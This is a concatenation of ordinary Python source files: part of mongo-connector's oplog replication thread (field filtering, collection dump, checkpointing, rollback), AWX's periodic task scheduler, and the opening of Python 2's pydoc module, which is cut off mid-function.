pymongo.errors.OperationFailure,
pymongo.errors.ConfigurationError):
LOG.exception(
"Cursor closed due to an exception. "
"Will attempt to reconnect.")
# update timestamp before attempting to reconnect to MongoDB,
# after being join()'ed, or if the cursor closes
if last_ts is not None:
LOG.debug("OplogThread: updating checkpoint after an "
"Exception, cursor closing, or join() on this"
"thread.")
self.update_checkpoint(last_ts)
LOG.debug("OplogThread: Sleeping. Documents removed: %d, "
"upserted: %d, updated: %d"
% (remove_inc, upsert_inc, update_inc))
time.sleep(2)
def join(self):
"""Stop this thread from managing the oplog.
"""
LOG.debug("OplogThread: exiting due to join call.")
self.running = False
threading.Thread.join(self)
@classmethod
def _find_field(cls, field, doc):
"""Find the field in the document which matches the given field.
The field may be in dot notation, eg "a.b.c". Returns a list with
a single tuple (path, field_value) or the empty list if the field
is not present.
"""
path = field.split('.')
try:
for key in path:
doc = doc[key]
return [(path, doc)]
except (KeyError, TypeError):
return []
@classmethod
def _find_update_fields(cls, field, doc):
"""Find the fields in the update document which match the given field.
Both the field and the top level keys in the doc may be in dot
notation, eg "a.b.c". Returns a list of tuples (path, field_value) or
the empty list if the field is not present.
"""
def find_partial_matches():
for key in doc:
if len(key) > len(field):
# Handle case where field is a prefix of key, eg field is
# 'a' and key is 'a.b'.
if key.startswith(field) and key[len(field)] == '.':
yield [key], doc[key]
# Continue searching, there may be multiple matches.
# For example, field 'a' should match 'a.b' and 'a.c'.
elif len(key) < len(field):
# Handle case where key is a prefix of field, eg field is
# 'a.b' and key is 'a'.
if field.startswith(key) and field[len(key)] == '.':
# Search for the remaining part of the field
matched = cls._find_field(field[len(key) + 1:],
doc[key])
if matched:
# Add the top level key to the path.
match = matched[0]
match[0].insert(0, key)
yield match
# Stop searching, it's not possible for any other
# keys in the update doc to match this field.
return
try:
return [([field], doc[field])]
except KeyError:
# Field does not exactly match any key in the update doc.
return list(find_partial_matches())
def _pop_excluded_fields(self, doc, exclude_fields, update=False):
# Remove all the fields that were passed in exclude_fields.
find_fields = self._find_update_fields if update else self._find_field
for field in exclude_fields:
for path, _ in find_fields(field, doc):
# Delete each matching field in the original document.
temp_doc = doc
for p in path[:-1]:
temp_doc = temp_doc[p]
temp_doc.pop(path[-1])
return doc # Need this to be similar to copy_included_fields.
def _copy_included_fields(self, doc, include_fields, update=False):
new_doc = {}
find_fields = self._find_update_fields if update else self._find_field
for field in include_fields:
for path, value in find_fields(field, doc):
# Copy each matching field in the original document.
temp_doc = new_doc
for p in path[:-1]:
temp_doc = temp_doc.setdefault(p, {})
temp_doc[path[-1]] = value
return new_doc
def filter_oplog_entry(self, entry, include_fields=None,
exclude_fields=None):
"""Remove fields from an oplog entry that should not be replicated.
NOTE: this does not support array indexing, for example 'a.b.2'"""
if not include_fields and not exclude_fields:
return entry
elif include_fields:
filter_fields = self._copy_included_fields
else:
filter_fields = self._pop_excluded_fields
fields = include_fields or exclude_fields
entry_o = entry['o']
# 'i' indicates an insert. 'o' field is the doc to be inserted.
if entry['op'] == 'i':
entry['o'] = filter_fields(entry_o, fields)
# 'u' indicates an update. The 'o' field describes an update spec
# if '$set' or '$unset' are present.
elif entry['op'] == 'u' and ('$set' in entry_o or '$unset' in entry_o):
if '$set' in entry_o:
entry['o']["$set"] = filter_fields(
entry_o["$set"], fields, update=True)
if '$unset' in entry_o:
entry['o']["$unset"] = filter_fields(
entry_o["$unset"], fields, update=True)
# not allowed to have empty $set/$unset, so remove if empty
if "$set" in entry_o and not entry_o['$set']:
entry_o.pop("$set")
if "$unset" in entry_o and not entry_o['$unset']:
entry_o.pop("$unset")
if not entry_o:
return None
# 'u' indicates an update. The 'o' field is the replacement document
# if no '$set' or '$unset' are present.
elif entry['op'] == 'u':
entry['o'] = filter_fields(entry_o, fields)
return entry
def get_oplog_cursor(self, timestamp=None):
"""Get a cursor to the oplog after the given timestamp, excluding
no-op entries.
If no timestamp is specified, returns a cursor to the entire oplog.
"""
query = {'op': {'$ne': 'n'}}
if timestamp is None:
cursor = self.oplog.find(
query,
cursor_type=CursorType.TAILABLE_AWAIT)
else:
query['ts'] = {'$gte': timestamp}
cursor = self.oplog.find(
query,
cursor_type=CursorType.TAILABLE_AWAIT,
oplog_replay=True)
return cursor
def get_collection(self, namespace):
"""Get a pymongo collection from a namespace."""
database, coll = namespace.split('.', 1)
return self.primary_client[database][coll]
def invoke_plugins_for_doc(self, operation, doc, plugins, dm):
"""Invoke all the plugins on a document event/operation.
"""
failures = 0
for plugin in plugins:
try:
LOG.debug('plugin invoke with %r', plugin)
if plugin.invoke(operation, doc, dm) is None:
failures += 1
except Exception:
if self.continue_on_error:
LOG.exception("Could not invoke plugin %s on doc: %r" %
(plugin.name(), doc))
failures += 1
else:
raise
return failures
def dump_collection(self):
"""Dumps collection into the target system.
This method is called when we're initializing the cursor and have no
configs i.e. when we're starting for the first time.
"""
timestamp = retry_until_ok(self.get_last_oplog_timestamp)
if timestamp is None:
return None
long_ts = util.bson_ts_to_long(timestamp)
# Flag if this oplog thread was cancelled during the collection dump.
# Use a list to workaround python scoping.
dump_cancelled = [False]
def get_all_ns():
ns_set = []
gridfs_ns_set = []
db_list = self.namespace_config.get_included_databases()
if not db_list:
# Only use listDatabases when the configured databases are not
# explicit.
db_list = retry_until_ok(self.primary_client.database_names)
for database in db_list:
if database == "config" or database == "local":
continue
coll_list = retry_until_ok(
self.primary_client[database].collection_names)
for coll in coll_list:
# ignore system collections
if coll.startswith("system."):
continue
# ignore gridfs chunks collections
if coll.endswith(".chunks"):
continue
if coll.endswith(".files"):
namespace = "%s.%s" % (database, coll)
namespace = namespace[:-len(".files")]
if self.namespace_config.gridfs_namespace(namespace):
gridfs_ns_set.append(namespace)
else:
namespace = "%s.%s" % (database, coll)
if self.namespace_config.map_namespace(namespace):
ns_set.append(namespace)
return ns_set, gridfs_ns_set
dump_set, gridfs_dump_set = get_all_ns()
LOG.debug("OplogThread: Dumping set of collections %s " % dump_set)
def docs_to_dump(from_coll):
last_id = None
attempts = 0
projection = self.namespace_config.projection(from_coll.full_name)
# Loop to handle possible AutoReconnect
while attempts < 60:
if last_id is None:
cursor = retry_until_ok(
from_coll.find,
projection=projection,
sort=[("_id", pymongo.ASCENDING)]
)
else:
cursor = retry_until_ok(
from_coll.find,
{"_id": {"$gt": last_id}},
projection=projection,
sort=[("_id", pymongo.ASCENDING)]
)
try:
for doc in cursor:
if not self.running:
# Thread was joined while performing the
# collection dump.
dump_cancelled[0] = True
raise StopIteration
last_id = doc["_id"]
yield doc
break
except (pymongo.errors.AutoReconnect,
pymongo.errors.OperationFailure):
attempts += 1
time.sleep(1)
def invoke_namespace_plugins(namespace, dm):
num_failed = 0
from_coll = self.get_collection(namespace)
mapped_ns = self.namespace_config.map_namespace(namespace)
total_docs = retry_until_ok(from_coll.count)
num = None
plugin_configs = self.namespace_config.get_plugin_configs(namespace)
plugins = PluginManager.resolve(plugin_configs)
# In order to update indexes, the inserts/prior updates need to
# be flushed out. Commit pending ops before invoking plugins.
dm.commit()
for num, doc in enumerate(docs_to_dump(from_coll)):
nperrs = self.invoke_plugins_for_doc('u', doc,plugins, dm)
if nperrs > 0:
num_failed += 1
if num % 10000 == 0:
LOG.info("Plugins invoked on %d out of approximately "
"%d docs from collection '%s'", num + 1,
total_docs, namespace)
if num_failed > 0:
LOG.error("Failed invoking plugins on %d docs", num_failed)
if num is not None:
LOG.info("Plugins invoked on %d out of approximately %d "
"docs from collection '%s'", num + 1, total_docs,
namespace)
def invoke_plugins(plugin_namespaces, dm):
for namespace in plugin_namespaces:
invoke_namespace_plugins(namespace, dm)
def upsert_each(dm):
num_failed = 0
namespaces_with_plugins = []
for namespace in dump_set:
LOG.debug("Checking if namespace %s has plugins",
namespace)
configs = self.namespace_config.get_plugin_configs(namespace)
if len(configs) > 0:
LOG.info("Adding namespace %s to ones with plugins",
namespace)
namespaces_with_plugins.append(namespace)
if not PluginManager.docs_index_needed(configs):
continue
from_coll = self.get_collection(namespace)
mapped_ns = self.namespace_config.map_namespace(namespace)
total_docs = retry_until_ok(from_coll.count)
num = None
for num, doc in enumerate(docs_to_dump(from_coll)):
try:
dm.upsert(doc, mapped_ns, long_ts)
except Exception:
if self.continue_on_error:
LOG.exception(
"Could not upsert document: %r" % doc)
num_failed += 1
else:
raise
if num % 10000 == 0:
LOG.info("Upserted %d out of approximately %d docs "
"from collection '%s'",
num + 1, total_docs, namespace)
if num is not None:
LOG.info("Upserted %d out of approximately %d docs from "
"collection '%s'",
num + 1, total_docs, namespace)
invoke_plugins(namespaces_with_plugins, dm)
if num_failed > 0:
LOG.error("Failed to upsert %d docs" % num_failed)
def upsert_all(dm):
namespaces_with_plugins = []
try:
for namespace in dump_set:
LOG.debug("Checking if namespace %s has any plugins",
namespace)
configs = self.namespace_config.get_plugin_configs(namespace)
if len(configs) > 0:
LOG.info("Adding %s to namespaces with plugins",
namespace)
namespaces_with_plugins.append(namespace)
if not PluginManager.docs_index_needed(configs):
continue
from_coll = self.get_collection(namespace)
total_docs = retry_until_ok(from_coll.count)
mapped_ns = self.namespace_config.map_namespace(
namespace)
LOG.info("Bulk upserting approximately %d docs from "
"collection '%s'",
total_docs, namespace)
dm.bulk_upsert(docs_to_dump(from_coll),
mapped_ns, long_ts)
invoke_plugins(namespaces_with_plugins, dm)
except Exception:
if self.continue_on_error:
LOG.exception("OplogThread: caught exception"
" during bulk upsert, re-upserting"
" documents serially")
upsert_each(dm)
else:
raise
def do_dump(dm, error_queue):
try:
LOG.debug("OplogThread: Using bulk upsert function for "
"collection dump")
upsert_all(dm)
if gridfs_dump_set:
LOG.info("OplogThread: dumping GridFS collections: %s",
gridfs_dump_set)
# Dump GridFS files
for gridfs_ns in gridfs_dump_set:
mongo_coll = self.get_collection(gridfs_ns)
from_coll = self.get_collection(gridfs_ns + '.files')
dest_ns = self.namespace_config.map_namespace(gridfs_ns)
for doc in docs_to_dump(from_coll):
gridfile = GridFSFile(mongo_coll, doc)
dm.insert_file(gridfile, dest_ns, long_ts)
except:
# Likely exceptions:
# pymongo.errors.OperationFailure,
# mongo_connector.errors.ConnectionFailed
# mongo_connector.errors.OperationFailed
error_queue.put(sys.exc_info())
# Extra threads (if any) that assist with collection dumps
dumping_threads = []
# Did the dump succeed for all target systems?
dump_success = True
# Holds any exceptions we can't recover from
errors = queue.Queue()
if len(self.doc_managers) == 1:
do_dump(self.doc_managers[0], errors)
else:
# Slight performance gain breaking dump into separate
# threads if > 1 replication target
for dm in self.doc_managers:
t = threading.Thread(target=do_dump, args=(dm, errors))
dumping_threads.append(t)
t.start()
# cleanup
for t in dumping_threads:
t.join()
# Print caught exceptions
try:
while True:
LOG.critical('Exception during collection dump',
exc_info=errors.get_nowait())
dump_success = False
except queue.Empty:
pass
if not dump_success:
err_msg = "OplogThread: Failed during dump collection"
effect = "cannot recover!"
LOG.error('%s %s %s' % (err_msg, effect, self.oplog))
self.running = False
return None
if dump_cancelled[0]:
LOG.warning('Initial collection dump was interrupted. '
'Will re-run the collection dump on next startup.')
return None
return timestamp
def _get_oplog_timestamp(self, newest_entry):
"""Return the timestamp of the latest or earliest entry in the oplog.
"""
sort_order = pymongo.DESCENDING if newest_entry else pymongo.ASCENDING
curr = self.oplog.find({'op': {'$ne': 'n'}}).sort(
'$natural', sort_order
).limit(-1)
try:
ts = next(curr)['ts']
except StopIteration:
LOG.debug("OplogThread: oplog is empty.")
return None
LOG.debug("OplogThread: %s oplog entry has timestamp %s."
% ('Newest' if newest_entry else 'Oldest', ts))
return ts
def get_oldest_oplog_timestamp(self):
"""Return the timestamp of the oldest entry in the oplog.
"""
return self._get_oplog_timestamp(False)
def get_last_oplog_timestamp(self):
"""Return the timestamp of the newest entry in the oplog.
"""
return self._get_oplog_timestamp(True)
def _cursor_empty(self, cursor):
try:
# Tailable cursors can not have singleBatch=True in MongoDB > 3.3
next(cursor.clone().remove_option(CursorType.TAILABLE_AWAIT)
.limit(-1))
return False
except StopIteration:
return True
def init_cursor(self):
"""Position the cursor appropriately.
The cursor is set to either the beginning of the oplog, or
wherever it was last left off.
Returns the cursor and True if the cursor is empty.
"""
timestamp = self.read_last_checkpoint()
if timestamp is None:
if self.collection_dump:
# dump collection and update checkpoint
timestamp = self.dump_collection()
self.update_checkpoint(timestamp)
if timestamp is None:
return None, True
else:
# Collection dump disabled:
# Return cursor to beginning of oplog but do not set the
# checkpoint. The checkpoint will be set after an operation
# has been applied.
cursor = self.get_oplog_cursor()
return cursor, self._cursor_empty(cursor)
cursor = self.get_oplog_cursor(timestamp)
cursor_empty = self._cursor_empty(cursor)
if cursor_empty:
# rollback, update checkpoint, and retry
LOG.debug("OplogThread: Initiating rollback from "
"get_oplog_cursor")
self.update_checkpoint(self.rollback())
return self.init_cursor()
first_oplog_entry = next(cursor)
oldest_ts_long = util.bson_ts_to_long(
self.get_oldest_oplog_timestamp())
checkpoint_ts_long = util.bson_ts_to_long(timestamp)
if checkpoint_ts_long < oldest_ts_long:
# We've fallen behind, the checkpoint has fallen off the oplog
return None, True
cursor_ts_long = util.bson_ts_to_long(first_oplog_entry["ts"])
if cursor_ts_long > checkpoint_ts_long:
# The checkpoint is not present in this oplog and the oplog
# did not rollover. This means that we connected to a new
# primary which did not replicate the checkpoint and which has
# new changes in its oplog for us to process.
# rollback, update checkpoint, and retry
LOG.debug("OplogThread: Initiating rollback from "
"get_oplog_cursor: new oplog entries found but "
"checkpoint is not present")
self.update_checkpoint(self.rollback())
return self.init_cursor()
# first entry has been consumed
return cursor, cursor_empty
def update_checkpoint(self, checkpoint):
"""Store the current checkpoint in the oplog progress dictionary.
"""
if checkpoint is not None and checkpoint != self.checkpoint:
self.checkpoint = checkpoint
with self.oplog_progress as oplog_prog:
oplog_dict = oplog_prog.get_dict()
# If we have the repr of our oplog collection
# in the dictionary, remove it and replace it
# with our replica set name.
# This allows an easy upgrade path from mongo-connector 2.3.
# For an explanation of the format change, see the comment in
# read_last_checkpoint.
oplog_dict.pop(str(self.oplog), None)
oplog_dict[self.replset_name] = checkpoint
LOG.debug("OplogThread: oplog checkpoint updated to %s",
checkpoint)
else:
LOG.debug("OplogThread: no checkpoint to update.")
def read_last_checkpoint(self):
"""Read the last checkpoint from the oplog progress dictionary.
"""
# In versions of mongo-connector 2.3 and before,
# we used the repr of the
# oplog collection as keys in the oplog_progress dictionary.
# In versions thereafter, we use the replica set name. For backwards
# compatibility, we check for both.
oplog_str = str(self.oplog)
ret_val = None
with self.oplog_progress as oplog_prog:
oplog_dict = oplog_prog.get_dict()
try:
# New format.
ret_val = oplog_dict[self.replset_name]
except KeyError:
try:
# Old format.
ret_val = oplog_dict[oplog_str]
except KeyError:
pass
LOG.debug("OplogThread: reading last checkpoint as %s " %
str(ret_val))
self.checkpoint = ret_val
return ret_val
def rollback(self):
"""Rollback target system to consistent state.
The strategy is to find the latest timestamp in the target system and
the largest timestamp in the oplog less than the latest target system
timestamp. This defines the rollback window and we just roll these
back until the oplog and target system are in consistent states.
"""
# Find the most recently inserted document in each target system
LOG.debug("OplogThread: Initiating rollback sequence to bring "
"system into a consistent state.")
last_docs = []
for dm in self.doc_managers:
dm.commit()
last_docs.append(dm.get_last_doc())
# Of these documents, which is the most recent?
last_inserted_doc = max(last_docs,
key=lambda x: x["_ts"] if x else float("-inf"))
# Nothing has been replicated. No need to rollback target systems
if last_inserted_doc is None:
return None
# Find the oplog entry that touched the most recent document.
# We'll use this to figure where to pick up the oplog later.
target_ts = util.long_to_bson_ts(last_inserted_doc['_ts'])
last_oplog_entry = util.retry_until_ok(
self.oplog.find_one,
{'ts': {'$lte': target_ts}, 'op': {'$ne': 'n'}},
sort=[('$natural', pymongo.DESCENDING)]
)
LOG.debug("OplogThread: last oplog entry is %s"
% str(last_oplog_entry))
# The oplog entry for the most recent document doesn't exist anymore.
# If we've fallen behind in the oplog, this will be caught later
if last_oplog_entry is None:
return None
# rollback_cutoff_ts happened *before* the rollback
rollback_cutoff_ts = last_oplog_entry['ts']
start_ts = util.bson_ts_to_long(rollback_cutoff_ts)
# timestamp of the most recent document on any target system
end_ts = last_inserted_doc['_ts']
for dm in self.doc_managers:
rollback_set = {} # this is a dictionary of ns:list of docs
# group potentially conflicted documents by namespace
for doc in dm.search(start_ts, end_ts):
if doc['ns'] in rollback_set:
rollback_set[doc['ns']].append(doc)
else:
rollback_set[doc['ns']] = [doc]
# retrieve these documents from MongoDB, either updating
# or removing them in each target system
for namespace, doc_list in rollback_set.items():
# Get the original namespace
original_namespace = self.namespace_config.unmap_namespace(
namespace)
if not original_namespace:
original_namespace = namespace
database, coll = original_namespace.split('.', 1)
obj_id = bson.objectid.ObjectId
bson_obj_id_list = [obj_id(doc['_id']) for doc in doc_list]
# Use connection to whole cluster if in sharded environment.
client = self.mongos_client or self.primary_client
to_update = util.retry_until_ok(
client[database][coll].find,
{'_id': {'$in': bson_obj_id_list}},
projection=self.namespace_config.projection(
original_namespace)
)
# Doc list are docs in target system, to_update are
# Docs in mongo
doc_hash = {} # Hash by _id
for doc in doc_list:
doc_hash[bson.objectid.ObjectId(doc['_id'])] = doc
to_index = []
def collect_existing_docs():
for doc in to_update:
if doc['_id'] in doc_hash:
del doc_hash[doc['_id']]
to_index.append(doc)
retry_until_ok(collect_existing_docs)
# Delete the inconsistent documents
LOG.debug("OplogThread: Rollback, removing inconsistent "
"docs.")
remov_inc = 0
for document_id in doc_hash:
try:
dm.remove(document_id, namespace,
util.bson_ts_to_long(rollback_cutoff_ts))
remov_inc += 1
LOG.debug(
"OplogThread: Rollback, removed %r " % doc)
except errors.OperationFailed:
LOG.warning(
"Could not delete document during rollback: %r "
"This can happen if this document was already "
"removed by another rollback happening at the "
"same time." % doc
)
LOG.debug("OplogThread: Rollback, removed %d docs." %
remov_inc)
# Insert the ones from mongo
LOG.debug("OplogThread: Rollback, inserting documents "
"from mongo.")
insert_inc = 0
fail_insert_inc = 0
for doc in to_index:
try:
insert_inc += 1
dm.upsert(doc,
namespace,
util.bson_ts_to_long(rollback_cutoff_ts))
except errors.OperationFailed:
fail_insert_inc += 1
LOG.exception("OplogThread: Rollback, Unable to "
"insert %r" % doc)
LOG.debug("OplogThread: Rollback, Successfully inserted %d "
" documents and failed to insert %d"
" documents. Returning a rollback cutoff time of %s "
% (insert_inc, fail_insert_inc, str(rollback_cutoff_ts)))
return rollback_cutoff_ts
|
periodic.py
|
import logging
import os
import time
from multiprocessing import Process
from django.conf import settings
from django.db import connections
from schedule import Scheduler
from awx.main.dispatch.worker import TaskWorker
logger = logging.getLogger('awx.main.dispatch.periodic')
class Scheduler(Scheduler):
def run_continuously(self):
idle_seconds = max(
1,
min(self.jobs).period.total_seconds() / 2
)
def run():
ppid = os.getppid()
logger.warn(f'periodic beat started')
while True:
if os.getppid() != ppid:
# if the parent PID changes, this process has been orphaned
# via e.g., segfault or sigkill, we should exit too
pid = os.getpid()
logger.warn(f'periodic beat exiting gracefully pid:{pid}')
raise SystemExit()
try:
for conn in connections.all():
# If the database connection has a hiccup, re-establish a new
# connection
conn.close_if_unusable_or_obsolete()
self.run_pending()
except Exception:
logger.exception(
'encountered an error while scheduling periodic tasks'
)
time.sleep(idle_seconds)
process = Process(target=run)
process.daemon = True
process.start()
def run_continuously():
scheduler = Scheduler()
for task in settings.CELERYBEAT_SCHEDULE.values():
apply_async = TaskWorker.resolve_callable(task['task']).apply_async
total_seconds = task['schedule'].total_seconds()
scheduler.every(total_seconds).seconds.do(apply_async)
scheduler.run_continuously()
|
pydoc.py
|
#!/usr/bin/env python
# -*- coding: latin-1 -*-
"""Generate Python documentation in HTML or text for interactive use.
In the Python interpreter, do "from pydoc import help" to provide online
help. Calling help(thing) on a Python object documents the object.
Or, at the shell command line outside of Python:
Run "pydoc <name>" to show documentation on something. <name> may be
the name of a function, module, package, or a dotted reference to a
class or function within a module or module in a package. If the
argument contains a path segment delimiter (e.g. slash on Unix,
backslash on Windows) it is treated as the path to a Python source file.
Run "pydoc -k <keyword>" to search for a keyword in the synopsis lines
of all available modules.
Run "pydoc -p <port>" to start an HTTP server on a given port on the
local machine to generate documentation web pages. Port number 0 can be
used to get an arbitrary unused port.
For platforms without a command line, "pydoc -g" starts the HTTP server
and also pops up a little window for controlling it.
Run "pydoc -w <name>" to write out the HTML documentation for a module
to a file named "<name>.html".
Module docs for core modules are assumed to be in
https://docs.python.org/library/
This can be overridden by setting the PYTHONDOCS environment variable
to a different URL or to a local directory containing the Library
Reference Manual pages.
"""
__author__ = "Ka-Ping Yee <ping@lfw.org>"
__date__ = "26 February 2001"
__version__ = "$Revision: 88564 $"
__credits__ = """Guido van Rossum, for an excellent programming language.
Tommy Burnette, the original creator of manpy.
Paul Prescod, for all his work on onlinehelp.
Richard Chamberlain, for the first implementation of textdoc.
"""
# Known bugs that can't be fixed here:
# - imp.load_module() cannot be prevented from clobbering existing
# loaded modules, so calling synopsis() on a binary module file
# changes the contents of any existing module with the same name.
# - If the __file__ attribute on a module is a relative path and
# the current directory is changed with os.chdir(), an incorrect
# path will be displayed.
import sys, imp, os, re, types, inspect, __builtin__, pkgutil, warnings
from repr import Repr
from string import expandtabs, find, join, lower, split, strip, rfind, rstrip
from traceback import extract_tb
try:
from collections import deque
except ImportError:
# Python 2.3 compatibility
class deque(list):
def popleft(self):
return self.pop(0)
# --------------------------------------------------------- common routines
def pathdirs():
"""Convert sys.path into a list of absolute, existing, unique paths."""
dirs = []
normdirs = []
for dir in sys.path:
dir = os.path.abspath(dir or '.')
normdir = os.path.normcase(dir)
if normdir not in normdirs and os.path.isdir(dir):
dirs.append(dir)
normdirs.append(normdir)
return dirs
def getdoc(object):
"""Get the doc string or comments for an object."""
result = inspect.getdoc(object) or inspect.getcomments(object)
result = _encode(result)
return result and re.sub('^ *\n', '', rstrip(result)) or ''
def splitdoc(doc):
"""Split a doc string into a synopsis line (if any) and the rest."""
lines = split(strip(doc), '\n')
if len(lines) == 1:
return lines[0], ''
elif len(lines) >= 2 and not rstrip(lines[1]):
return lines[0], join(lines[2:], '\n')
return '', join(lines, '\n')
def classname(object, modname):
"""Get a class name and qualify it with a module name if necessary."""
name = object.__name__
if object.__module__ != modname:
name = object.__module__ + '.' + name
return name
def isdata(object):
"""Check if an object is of a type that probably means it's data."""
return not (inspect.ismodule(object) or inspect.isclass(object) or
inspect.isroutine(object) or inspect.isframe(object) or
inspect.istraceback(object) or inspect.iscode(object))
def replace(text, *pairs):
"""Do a series of global replacements on a string."""
while pairs:
text = join(split(text, pairs[0]), pairs[1])
pairs = pairs[2:]
return text
def cram(text, maxlen):
"""Omit part of a string if needed to make it fit in a maximum length."""
if len(text) > maxlen:
pre = max(0, (maxlen-3)//2)
post = max(0, maxlen-3-pre)
return text[:pre] + '...' + text[len(text)-post:]
return text
_re_stripid = re.compile(r' at 0x[0-9a-f]{6,16}(>+)$', re.IGNORECASE)
def stripid(text):
"""Remove the hexadecimal id from a Python object representation."""
# The behaviour of %p is implementation-dependent in terms of case.
return _re_stripid.sub(r'\1', text)
def _is_some_method(obj):
return inspect.ismethod(obj) or inspect.ismethoddescriptor(obj)
def allmethods(cl):
methods = {}
for key, value in inspect.getmembers(cl, _is_some_method):
methods[key] = 1
for base in cl.__bases__:
methods.update(allmethods(base)) # all your base are belong to us
for key in methods.keys():
methods[key] = getattr(cl, key)
return methods
def _split_list(s, predicate):
"""Split sequence s via predicate, and return pair ([true], [false]).
The return value is a 2-tuple of lists,
([x for x in s if predicate(x)],
[x for x in s if not predicate(x)])
"""
yes = []
no = []
for x in s:
if predicate(x):
yes.append(x)
else:
no.append(x)
return yes, no
def visiblename(name, all=None, obj=None):
"""Decide whether to show documentation on a variable."""
# Certain special names are redundant.
_hidden_names = ('__builtins__', '__doc__', '__file__', '__path__',
'__module__', '__name__', '__slots__', '__package__')
if name in _hidden_names: return 0
# Private names are hidden, but special names are displayed.
if name.startswith('__') and name.endswith('__'): return 1
# Namedtuples have public fields and methods with a single leading underscore
if name.startswith('_') and hasattr(obj, '_fields'):
return 1
if all is not None:
# only document that which the programmer exported in __all__
return name in all
else:
return not name.startswith('_')
def classify_class_attrs(object):
"""Wrap inspect.classify_class_attrs, with fixup for data descriptors."""
def fixup(data):
name, kind, cls, value = data
if inspect.isdatadescriptor(value):
kind = 'data descriptor'
return name, kind, cls, value
return map(fixup, inspect.classify_class_attrs(object))
# ----------------------------------------------------- Unicode support helpers
try:
_unicode = unicode
except NameError:
# If Python is built without Unicode support, the unicode type
# will not exist. Fake one that nothing will match, and make
# the _encode function that do nothing.
class _unicode(object):
pass
_encoding = 'ascii'
def _encode(text, encoding='ascii'):
return text
else:
import locale
_encoding = locale.getpreferredencoding()
def _encode(text, encoding=None):
if isinstance(text, unicode):
return text.encode(encoding or _encoding, 'xmlcharrefreplace')
else:
return text
def _binstr(obj):
# Ensure that we have an encoded (binary) string representation of obj,
# even if it is a unicode string.
if isinstance(obj, _unicode):
return obj.encode(_encoding, 'xmlcharrefreplace')
return str(obj)
# ----------------------------------------------------- module manipulation
def ispackage(path):
"""Guess whether a path refers to a package directory."""
if os.path.isdir(path):
for ext in ('.py', '.pyc', '.pyo'):
if os.path.isfile(os.path.join(path, '__init__' + ext)):
return True
return False
def source_synopsis(file):
line = file.readline()
while line[:1] == '#' or not strip(line):
line = file.readline()
if not line: break
line = strip(line)
if line[:4] == 'r"""': line = line[1:]
if line[:3] == '"""':
line = line[3:]
if line[-1:] == '\\': line = line[:-1]
while not strip(line):
line = file.readline()
if not line: break
result = strip(split(line, '"""')[0])
else: result = None
return result
def synopsis(filename, cache={}):
"""Get the one-line summary out of a module file."""
mtime = os.stat(filename).st_mtime
lastupdate, result = cache.get(filename, (None, None))
if lastupdate is None or lastupdate < mtime:
info = inspect.getmoduleinfo(filename)
try:
file = open(filename)
except IOError:
# module can't be opened, so skip it
return None
if info and 'b' in info[2]: # binary modules have to be imported
try: module = imp.load_module('__temp__', file, filename, info[1:])
except: return None
result = module.__doc__.splitlines()[0] if module.__doc__ else None
del sys.modules['__temp__']
else: # text modules can be directly examined
result = source_synopsis(file)
file.close()
cache[filename] = (mtime, result)
return result
class ErrorDuringImport(Exception):
"""Errors that occurred while trying to import something to document it."""
def __init__(self, filename, exc_info):
exc, value, tb = exc_info
self.filename = filename
self.exc = exc
self.value = value
self.tb = tb
def __str__(self):
exc = self.exc
if type(exc) is types.ClassType:
exc = exc.__name__
return 'problem in %s - %s: %s' % (self.filename, exc, self.value)
def importfile(path):
"""Import a Python source file or compiled file given its path."""
magic = imp.get_magic()
file = open(path, 'r')
if file.read(len(magic)) == magic:
kind = imp.PY_COMPILED
else:
kind = imp.PY_SOURCE
file.close()
filename = os.path.basename(path)
name, ext = os.path.splitext(filename)
file = open(path, 'r')
try:
module = imp.load_module(name, file, path, (ext, 'r', kind))
except:
raise ErrorDuringImport(path, sys.exc_info())
file.close()
return module
def safeimport(path, forceload=0, cache={}):
"""Import a module; handle errors; return None if the module isn't found.
If the module *is* found but an exception occurs, it's wrapped in an
ErrorDuringImport exception and reraised. Unlike __import__, if a
package path is specified, the module at the end of the path is returned,
not the package at the beginning. If the optional 'forceload' argument
is 1, we reload the module from disk (unless it's a dynamic extension)."""
try:
# If forceload is 1 and the module has been previously loaded from
# disk, we always have to reload the module. Checking the file's
# mtime isn't good enough (e.g. the module could contain a class
# that inherits from another module that has changed).
if forceload and path in sys.modules:
if path not in sys.builtin_module_names:
# Avoid simply calling reload() because it leaves names in
# the currently loaded module lying around if they're not
# defined in the new source file. Instead, remove the
# module from sys.modules and re-import. Also remove any
# submodules because they won't appear in the newly loaded
# module's namespace if they're already in sys.modules.
subs = [m for m in sys.modules if m.startswith(path + '.')]
for key in [path] + subs:
# Prevent garbage collection.
cache[key] = sys.modules[key]
del sys.modules[key]
module = __import__(path)
except:
# Did the error occur before or after the module was found?
(exc, value, tb) = info = sys.exc_info()
if path in sys.modules:
# An error occurred while executing the imported module.
raise ErrorDuringImport(sys.modules[path].__file__, info)
elif exc is SyntaxError:
# A SyntaxError occurred before we could execute the module.
raise ErrorDuringImport(value.filename, info)
elif exc is ImportError and extract_tb(tb)[-1][2]=='safeimport':
# The import error occurred directly in this function,
# which means there is no such module in the path.
return None
else:
# Some other error occurred during the importing process.
raise ErrorDuringImport(path, sys.exc_info())
for part in split(path, '.')[1:]:
try: module = getattr(module, part)
except AttributeError: return None
return module
# ---------------------------------------------------- formatter base class
class Doc:
def document(self, object, name=None, *args):
"""Generate documentation for an object."""
args = (object, name) + args
# 'try' clause is to attempt to handle the possibility that inspect
# identifies something in a way that pydoc itself has issues handling;
# think 'super' and how it is a descriptor (which raises the exception
# by lacking a __name__ attribute) and an instance.
if inspect.isgetsetdescriptor(object): return self.docdata(*args)
if inspect.ismemberdescriptor(object): return self.docdata(*args)
try:
if inspect.ismodule(object): return self.docmodule(*args)
if inspect.isclass(object): return self.docclass(*args)
if inspect.isroutine(object): return self.docroutine(*args)
except AttributeError:
pass
if isinstance(object, property): return self.docproperty(*args)
return self.docother(*args)
def fail(self, object, name=None, *args):
"""Raise an exception for unimplemented types."""
message = "don't know how to document object%s of type %s" % (
name and ' ' + repr(name), type(object).__name__)
raise TypeError, message
docmodule = docclass = docroutine = docother = docproperty = docdata = fail
def getdocloc(self, object,
basedir=os.path.join(sys.exec_prefix, "lib",
"python"+sys.version[0:3])):
"""Return the location of module docs or None"""
try:
file = inspect.getabsfile(object)
except TypeError:
file = '(built-in)'
docloc = os.environ.get("PYTHONDOCS",
"https://docs.python.org/library")
basedir = os.path.normcase(basedir)
if (isinstance(object, type(os)) and
(object.__name__ in ('errno', 'exceptions', 'gc', 'imp',
'marshal', 'posix', 'signal', 'sys',
'thread', 'zipimport') or
(file.startswith(basedir) and
